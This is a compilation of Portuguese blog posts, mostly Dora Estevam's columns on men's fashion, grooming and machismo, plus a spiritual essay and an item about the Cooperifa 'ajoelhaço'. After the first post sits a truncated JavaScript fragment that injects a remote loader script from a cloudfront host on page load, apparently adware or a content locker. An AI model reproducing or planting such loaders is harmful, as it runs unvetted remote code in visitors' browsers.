Sapato para homens

 

Por Dora Estevam

 

Como escolher um sapato masculino?
Eu não me atrevo!
Escolher um feminino com tantas opções de cores, estilos, tamanhos e modelos já é difícil. Imagina escolher um masculino que não tem tantas opções assim. Marrom, preto e .. o que mais mesmo ?

 

Vamos tentar novamente.

 

Tenho andado pelos corredores dos shoppings e as opções não fogem muito dos neutros, pois estamos em uma estação mais fria que pede uma cor mais quente. Hum ! Acho que esta explicação não funcionou.

 

A ousadia em usar modelos coloridos fica mais para os jovens, bem jovens, e os mais formais para as ocasiões que as etiquetas e regras exigem: trabalho, restaurante, casamento, etc.

 

No dia-a-dia os mais informais ficam bem com jeans ou cargo; na parte de cima as variações entre camisetas, camisas e blazer sem gravata ficam bem charmosas com os sapatos de solado emborrachado em couro ou camurça.

 

 

Há um modelo no mercado que eu diria nada comercial que são os creepers. Eles são gigantes e foram criados na década de 80 para os punkeiros, hoje, renovados, estão nas ruas e em passarelas, mas é muito específico, veja o modelo da foto.

 

 

Melhor deixar para eles mesmo, o que você acha?

 

Vou tentar de novo. Vamos assistir ao vídeo da marca Dsquarede2, no qual aparecem botas clássicas usadas com jeans e alfaiataria, além das produções com jaquetas que são ótimas reFerências para o homem brasileiro.

 

 

Agora, contrarindo o inicio do meu post, vou fazer uma whish list que separei pra vocês, especialmente para o dia dos namorados, espero que gostem.

 

 

E ai rapazes, aprovaram?

 


Dora Estevam é jornalista e escreve sobre moda e estilo de vida no Blog do Mílton Jung, aos sábados.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>

Divirta-se, a moda é masculina

 

Por Dora Estevam
 
Estou adorando todas as postagens de moda masculina. O que os desfiles de Paris, Milão e São Paulo mostraram para os homens é algo totalmente vigoroso de uma alegria contagiosa.  Os desfiles estão cada vez mais incríveis em termos de produção e moda, propriamente combinados.
 
Quer matar a curiosidade de como funciona este meio?

Acompanhe o vídeo a seguir. Foi feito por Justin Wu especialmente para Jak & Jill Blol. Super carinhoso e de bom gosto. Alegre, cheio de vida, o vídeo mostra os bastidores dos desfiles e de alguns dos melhores momentos dos meninos de Paris e Milão. Adoro!

Por aqui, separei algumas fotos de alguns estilistas. É tudo muito diferente, foge do que estamos acostumados a ver nas ruas. Mas vamos respeitar o trabalho destes moços, certo?
 
LINO VILLAVENTURA

Lino fez uma moda renovada para homenagear os 15 anos da São Paulo Fashion Week.

 
 
ALEXANDRE HERCHCOVICH

Se depender de Alexandre pode vir terremoto, vulcões ou tempestades. Com as roupas que ele criou para o próximo inverno os homens estarão protegidos de tudo isso. Ah, e modernos!


  
JOÃO PIMENTA

Trouxe um desfile inspirado na moda militar e religiosa. Entendi. Quase um franciscano. Um frasciscano com dinheiro.


 
 
 
 
CAVALERA

Fez chover para dar um clima intimista, mais a cara da cidade nestes dias tão molhados.
 

 
Por toda esta produção você deve ter imaginado o quanto estes estilistas trabalharam. Um esforço e tanto. Tudo isso você terá o prazer de ver pessoalmente, provar e ter uma ou várias peças em seu armário em poucos meses, em lojas de shoppings e de rua.
 
 É o horizonte da moda masculina – como escrevi no post anterior.
 
E você está preparado para ser este homem?

Dora Estevam é jornalista e escreve sobre moda e estilo de vida no Blog do Mílton Jung, aos sábados

De semente


Por Maria Lucia Solla

Zeus at Versailles

Ouça De Semente na voz e sonorizado pela autora

Estamos muito afastados do divino, e é urgente que esse elo seja restabelecido. Eu não saberia dizer como nem quando começamos a nos afastar, mas tenho pistas do afastamento, e pistas da reaproximação.

Para começar, há muito ignoramos os mitos; a ponto de lançarmos olhares enviesados, quando alguém fala de Afrodite, Atena, Cronos ou Hermes. Desprezamos o passado como se fosse bagaço, sem perceber que é na estrada esculpida por ele que eu e você caminhamos aos tropeços, por não conhecer seu traçado.

Atena é intelectual; mais cabeça do que corpo. Afrodite, ou Vênus, tem o cetro do amor e da beleza, enquanto Apolo é um deus artista que se guia pela intuição. Só para dar uma provinha do que é o Panteão.

Deletamos os deuses e usurpamos seus atributos, como crianças mimadas que roubam o Ferrari do papai e se esborracham na primeira curva. Substituímos os deuses que nos serviam de bússola, por máquinas e outras traquitanas.

Conhecendo deuses, seus mitos, suas histórias encontramos as pistas que procuramos para compreender os nossos homens, e eles podem entender a que viemos, nós as mulheres, se conhecerem um pouco das deusas.

A mulher esqueceu que representa a vida, para onde ela traz o homem, e quer ser reconhecida por algo que nem mesmo sabe o que é. Assim segue cambaleando, batendo a cabeça, feito galinha-sem-cabeça zanzando pelo terreiro, antes de mergulhar na panela. Segue sem decidir se se orgulha de ser o que é ou se quer parecer ser o que não é.

Os povos que nos precederam criaram mitos e os presentearam de geração em geração, como mantras, como oração; e nós, com toda a modernidade, esquecidos do Paraíso, em vez de abraçarmos uns aos outros, espalhamos pela Terra incompreensão e ganância, desde a mais tenra idade. Sonegamos amor; e amor é como água, se não deságua inunda, e se inunda mata.

Ah, Zeus, pai de deuses e homens, aí do teu trono no Olimpo, olha por nós que nos colocamos assim, de próprio desejo, em total abandono.

Ah, Cronos, deus do tempo e da responsabilidade, faz que percebamos da vida a finalidade.

Netuno senhor dos mares, faz que entendamos que a turbulência é só na superfície; nas profundezas de mares e amares há mais beleza que tristeza.

Somos universos em miniatura; contemos tudo, o universo inteiro, o mesmo celeiro que encontraríamos, se tivéssemos acesso aos universos fora de nós.

e na chegada do natal

agradeço pela vida

pelas vidas que gerei

pelas geradas por elas

e por todas as que fisicamente

não conhecerei

as vidas que geraram a minha

quero também agradecer

pelo que desde o início dos tempos

me permitiram perceber

Παν = todo – θεοσ =deus – Pan + Téos = Panteão.

Maria Lucia Solla é terapeuta, professora de língua estrangeira e realiza curso de comunicação e expressão. Aos domingos escreve no Blog do Mílton Jung

Muito além do paletó e gravata

 

Por Dora Estevam

A questão não é só o nó da gravata.

Têm homens que amam gravatas, de todas as cores e padrões. Quando viajam compram centenas delas de várias marcas ou sem-marca, o importante é gostar e achar que aquela vai fazer a diferença.
 
Bom, com verão ou sem verão quem usa gravata obrigatoriamente e não pode evitá-las, acaba sempre encontrando um jeitinho de produzir o visual de maneira que a gravata não pese e, sim, que ela fique charmosa e irresistível aos olhares femininos.
 
Separei alguns modelos para vocês se inspirarem:

  
 
Mas também tem a turma dos sem-gravata. Eles não suportam as compridinhas, quando tem um casamento que pede o uso delas ficam numa frescura só, usam, mas logo fazem aquele charme de tirar na festa. Enfim, tem gosto pra tudo e para todos.
 
Como toda produção, sem gravata também é possível ficar charmoso e elegante com muita classe. Até que passa um ar de conquistador e despojado. Também separei alguns modelos para você ter ideia do que estão usando pelo mundo.

Ah, não pense que são modelos para revistas, são pessoas clicadas na rua. São os fotógrafos de streetstyle que adoram saber o que as pessoas normais usam no dia-a-dia.


  
Ah tá ! Ai você me diz, mas eu não gosto de gravata muito menos de paletó. O seu estilo é muito mais esportivo e descontraído. Sem problema. Também vale e muito, ainda mais no Brasil onde temos clima favorável para exibir corpos saudáveis e roupas coloridas.
 
Inspire-se:


 
Então, gostaram? Use a química do seu bom gosto com bom senso e a sua simpatia e arrase nestas festas.
 
Dora Estevam é jornalista e escreve sobre moda e estilo de vida no Blog do Mílton Jung

A moda masculina em 2011

 

Por Dora Estevam
 
Aconteça o que for, dificilmente o homem terá grandes surpresas quando o assunto for moda masculina. Se aparece alguma coisa do gênero “calça com barra dobrada”, imediatamente a ideia é abortada por boa parte deles. Sem dúvida o clássico renovado aparece sempre nas passarelas com poucas mudanças nas tonalidades e no estilo. Mas sempre com muita elegância. Se você pretende ir às compras no próximo mês e se presentear – ou presentear alguém – tenha em mente as tendências masculinas para 2011. São opções clássicas e eternas.
 
Sapatos: esta linha de doksiders nas padronagens de camurça ou couro nas cores uísque e marrom são perfeitas para trabalho e passeio.

Para acompanhar, jaquetas bárbaras em vários tecidos. No verde e khaji, são práticas e confortáveis. Menos formais, elas acompanham o homem sem fazer feio. E para quem quer sofisticar mais um pouco, o couro é uma excelente opção: preto, grafite ou camelo – masculinas e maravilhosas.


 
Para um homem mais sério que não abre mão do terno ou peças em alfaiataria, a sugestão continua na gama dos cinzas passando do claro para o escuro.  Os tricots também são válidos: mesmo na estação mais quente existem fios especiais para isso. Não é comum, mas se quiser investir em um, siga a dica: malharia misturada com camisaria sempre apresenta um bom resultado.


 
E, finalmente, para os queridos que adoram jeans e não abrem mão deles de forma alguma. As tonalidades também passam pelo bege e branco para as camisetas (inseparáveis) e black –para as calças.


 
Gostaram?

Bem, estas são algumas das propostas para você passar o próximo ano em paz com o seu armário.

Dora Estevam é jornalista e escreve sobre moda e estilo no Blog do Mílton Jung, aos sábados.

 
Reprodução: Acne, Prada, Martin Margiela, Acne e Dsquared2.

Homens vaidosos e antenados

 

Por Dora Estevam

Homens, homens… Tanto fizeram que conseguiram. O mercado da beleza para os homens cresce cada vez mais. Nem precisa de dados ou estatísticas para constatar, basta olhar nas prateleiras das lojas e perfumarias. Dê uma espiada, também, na banca de revistas.

Moda masculina AbreSim, revistas direcionadas para homens. E olha que a concorrência é grande: VMan, a espanhola Tendências, AnOther Man’s, GQ da Rússia, da França … enfim, várias.

A última da francesa GQ traz o editorial com o modelo polonês Jarek Pietka.O tema é Two Faces, sugere um homem multifacetado que vai do casual ao social, sem crise de identidade, com muita classe e elegância.

E os anúncios são bem parecidos com os das mulheres, verdadeiras promessas de beleza; spray para cabelos; produtos essenciais para cuidar da pele, com ênfase na questão limpeza e tratamentos para oleosidade. E não para por ai, tem algumas promoções que eles fazem com parcerias de revistas e empresas nas quais os participantes se inscrevem e concorrem a kits de beleza; de chinelos a bolsinhas plásticas.

Moda masculina Meio

Assim como nos blogs femininos, nos masculinos eles também deixam suas impressões. Algo como: “sou apaixonado por editorias de moda”. Tem ainda dicas de produções. E as perguntas seguem: o que acharam dessa roupa, você usaria? Verdadeira inspiração.

Moda masculina FechaE eu não posso esquecer realmente do ícone fashion mais badalado do mundo: Cristiano Ronaldo, jogador português. Modelo do Armani tem exibido suas formas (e que forma … ufa!!!) pelas páginas de revistas e publicidade. Ele cuida muitíssimo do físico e da pele. As sobrancelhas bem desenhadas exibidas em jogo de Copa são outro sinal desta vaidade.

Um dia você chega lá, não desanime, é só ter coragem.

O homem antenado acompanha todos os desfiles de lançamentos pela internet. Os últimos, no cat walk de Milão, mostraram o Verão’11. Tem motivos inspirados em caveiras, tem alfaiataria rasgada, tem estilo andrógino, calça com saia (pra homem). Tem de tudo.

Para os pés, quando o termômetro subir e bater aquele sol forte, nada de chinelão: espadrilhes e sandálias.

Use as dicas e renove a sua vida. Seja versátil como a moda. Eu sei que tudo isso é provocante e desafiador, deixe o subjetivo de lado e use o seu charme para deixar as melhores impressões nesta temporada. As mulheres vão amar.

Dora Estevam é jornalista e escreve sobre moda e estilo no Blog do Mílton Jung, aos sábados

Homem quentinho

 

Por Dora Estevam

Bem quentinho e com estilo próprio, é assim que o homem vai passar o inverno brasileiro 2010. E o melhor de tudo, com roupas que tem a sua cara.

Seja para homem clean, clássico, alternativo, moderno ou elegante, tem proposta para todos.

Foto 4Inverno é assim: quando ele está chegando você tira uma pecinha aqui, outra ali, vê o que dá para usar, o que está conservado e o que também não está, o que por algum motivo foi fazê-la parar no fundo do armário.

Ai, vem à velha pergunta: mas isso ainda está na moda?

Bem, posso dizer que você não deve se preocupar com isso, pelo menos neste momento.

Roupa de homem tem sempre um estilo próprio, as peças normalmente são básicas e acabam virando peças-chave no armário. Veja aquele caschemere amarelinho: nossa, tá novinho! Quem bom. Vai evitar um gasto com isso.

E os ternos? Vai ano vem ano e as cores são basicamente as mesmas: preto, cinza, azul marinho, bege. Ah mas ai você me cobra: e as tendências, como ficam ?

É simples: troque as camisas, as gravatas e os sapatos e você terá um novo e eterno terno. A elegância está nas suas escolhas. Caso o terno esteja batidinho ai sim vale a pena comprar um para repor, sem dúvida o terno é o melhor companheiro do homem na hora de fechar o grande negócio.

A dupla infalível é o paletó com jeans. São chics e vão do dia à noite, sem problemas. Também tem a linha jaqueta de couro com calça de algodão, fica lindo. E são modelos que com certeza todo homem tem no guarda-roupa.

Homem também gosta de gastar com roupas, então quando chega o fim de semana correm para os shoppings e não param mais, a listinha é tão longa quanto à das mulheres: vai relógio, cinto, tênis, sacola de academia, uma pólo bem bacana e moderna (dessas inspiradas nos estilos colleges americanos) um belo par de mocassim, o perfume, os óculos de sol e por ai vai.

Foto 5

Na verdade os últimos desfiles mostraram uma tendência muito forte voltada para o lado esportivo, mas uma moda mais grunge, tipo não to nem ai pra nada, e o estilo roqueiro, que não é pra todo mundo.

De qualquer forma vale a experiência de usar o que quer de maneira prática, estilosa e confortável.

Sem deixar ser quentinho.

Dora Estevam é jornalista e escreve aos sábados no Blog do Mílton Jung

O defeito dos homens, por elas

 

Por Dora Estevam

Falar da celulite, do rosto enrugado, da barriga que teima em se mostrar e do bumbum caído da mulher é fácil. E como se fala. Mas quando nós fazemos comparações com homens tipo David Beckham – o abdome mais sarado do mundo – aí é covardia. A comparação é injusta, dirá alguém. E quem está falando em justiça ?

David_Beckham

Dos defeitos no físico e na personalidade. Se é para é falar do que não gosta neles, as mulheres não perdoam: barriga caída, barriga estufada, barriga de cerveja. Não faltam adjetivos. E qualquer um desses é insuportável.

Vamos a lista:

Ø    Dentes amarelados ou a falta de um deles
Ø   Horas diante do computador sem dar a mínima para a família
Ø  Adoração pelo futebol somada a mania de vestir a camisa do clube quando recebe visita em casa. É do time dos cafonas.
Ø    Barulhinho com a colher do café, mexendo o açúcar
Ø    Preguiça de tudo, não levanta por nada      
Ø    Pintar os cabelos brancos ou (tentar) esconder a careca.
Ø    Senhores de idade avançada com look de bad boy
Ø   Nunca reparar na roupa nova da mulher e quando repara pergunta se custou caro.

O comportamento do homem se estende da casa para o trabalho, e a aparência é capaz de indicar que ele é megainteligente na atividade profissional mas em casa não passa de um Ogro. Não dá !

Eu, particularmente, não gosto quando vou ao restaurante com a família e tem lá uma mesa cheia de homens falando bobagens em alto e bom som, é muito desagradável. 

Alguns defeitos você tolera, mas quando superarm as qualidades, aquele abraço.
 
Mulher não tolera falta de educação, falta de higiene, falta de asseio. Não tolera que o seu marido fique olhando para o traseiro ou derrière da menina que passa … apenas para lembrar algumas dentre muitas reclamações, pois para todas não haveria espaço suficiente aqui.

Tudo bem, você não precisa ser um lorde Inglês (ou um craque inglês como Beckham) , mas tem alguns cuidados que não custam caro e podem melhorar muito a sua aparência física e intelectual com reflexos na sua auto-estima. Vá por mim:
 
Ø    Comece praticando algum exercício;
Ø    Se tiver os dentes amarelados, opte por fazer um clareamento;
Ø    Deixe sempre a barba bem feita;
Ø    Mantenha os cabelos bem cortados e limpos;
Ø    Faça de vez em quando uma limpeza de pele;
Ø    Procure usar um filtro solar e creme;
Ø    Na roupa, procure as cores da estação para não destoar dos outros;
Ø    E, acima de tudo, tenha educação em qualquer situação da sua vida.

A ideia não é fazer de você um homem obsessivo pela beleza, levá-lo a torrar o dinheiro com produtos caríssimos nem tão pouco transformá-lo em um jovenzinho sem idade para tal. É, sim, a de criar uma imagem interessante e bacana, para ser respeitado pelas pessoas que o rodeiam, no trabalho, em casa, entre os amigos.
 
A ala feminina agradece.

Dora Estevam é jornalista e aos sábados escreve no Blog do Mílton Jung sobre moda e estillo de vida.

Mulher trabalhadora, homem ciumento

 

Por Dora Estevam
Tais e Marcos, Viver a Vida

É impressionante como ainda tem muito homem que não deixa a mulher trabalhar fora. As promessas são sempre as mesmas: fique em casa e eu te darei tudo.

A mulher que fica em casa se dedica aos filhos, casa e marido.Esquece que dentro dela tem um potencial que aos poucos se esconde, perde espaço. Sem trabalhar, sem pensar, sem se motivar; no mínimo o cérebro atrofia Depois de alguns anos – quando a vida a dois já está desgastada pela rotina – a mulher tenta se recolocar no mercado. O resultado você pode imaginar, enormes e várias dificuldades.

A menina, 22 anos, engravidou aos 17, resolveu quebrar a rotina, enfrentar o marido e procurar emprego. Encontrou: um mês depois, incomodado com as saídas da esposa, o marido exige que ela deixe o emprego. Sim, para ela trabalhar tem todo um ritual de beleza e arrumação que incomoda o sujeito.

A outra pula de casa em casa. De 40 em 40 dias está numa casa diferente porque o marido é quem sempre decide, a palavra é sempre dele: saia para cuidar das suas filhas.

Na Paraisópolis, comunidade popular de São Paulo, no Dia Internacional da Mulher, a porta da floricultura estava cheia de homens. A florista ficou na expectativa de boas vendas, mas, nada aconteceu. Eram somente maridos falando mal das mulheres, relata uma moradora.

São empregadas domésticas, babás, faxineiras, vendedoras….

Todos estes casos são de pessoas, de mulheres que moram na Paraisópolis e segunda-feira passada não tiveram o que comemorar.

Do outro lado do universo – o lado fantasioso – também existe um machista que não aceita a condição da mulher exercer a profissão dela. Eu falo do personagem Marcos, que tem José Mayer como protagonista, da novela “Viver a Vida”, da Rede Globo. Helena, a modelo, esposa, [mega-über] famosa fica entre o casamento e a profissão.

O empresário Marcos é o tipo que dá tudo pra mulher, do luxo ao glamour. Mas impede a moça de exibir a liberdade que conquistou há anos, com muita luta.

O que explica este comportamento? Que machismo é esse que acontece em todas as camadas sociais?

Sabemos que com a revolução sexual a mulher deixou de ser Amélia e conquistou o mercado de trabalho. Há mulheres com altos cargos nas empresas, mulheres que ganham uma fortuna, que dirigem grandes corporações. Há um mercado todo voltado para elas. Sem dúvida, enfrentaram e enfrentam um longo caminho para a conquista da dignidade pessoal, social e profissional.

A mulher é capaz de dar conta do recado, sim, cuida da casa, dos filhos, do marido, do trabalho, e ainda sobra tempo para se cuidar, se tratar – esteticamente falando. Sem contar as muitas que estudam sem parar, mestrado, doutorado, o que exige muito tempo de leitura.

Nada contra as que preferem ficar em casa, nada contra as que optaram por exercer as tarefas domésticas. Sei que esta opção exige muito trabalho delas, além da conta, muitas vezes.

Falo é dos homens ciumentos que impedem o crescimento profissional e intelectual da mulher, que exigem que ela fique em casa por puro machismo.

O Dia Internacional da Mulher foi criado para lembrar a morte de mulheres que, em frente a uma fábrica em Nova York, lutaram pela redução da carga de trabalho para dez horas, equiparação de salários com os homens e tratamento digno no ambiente de trabalho.

Foi-se o tempo em que as mulheres eram criadas para procriar e embelezar o marido. No século 19, as mulheres eram consideradas probleminha para a sociedade; hoje, o probleminha pode ser você, homem ciumento.

Dora Estevam é jornalista e escreve no Blog do Mílton Jung aos sábados sobre moda e estilo de vida

Homens fazem ‘ajoelhaço’ pelo perdão das mulheres

 

ajoelhaço+2010+-+43

Centenas de homens ajoelhados pedindo perdão. A cena se repetiu pelo quarto ano no Sarau da Cooperifa em comemoração ao Dia Internacional da Mulher. Sérgio Vaz explica que o “ajoelhaço” é uma forma de os homens se desculparem por anos de injustiça e preconceito.

No Blog Colecionador de Pedras escreve que não basta o ato simbólico, é preciso mudança de comportamento. Acredita que os frequentadores da Cooperifa tem um perfil menos machista e se ajoelham porque sabem o quanto a mulher é humilhada em seu cotidiano. “Respeito não é apenas uma palavra, é um sentimento”.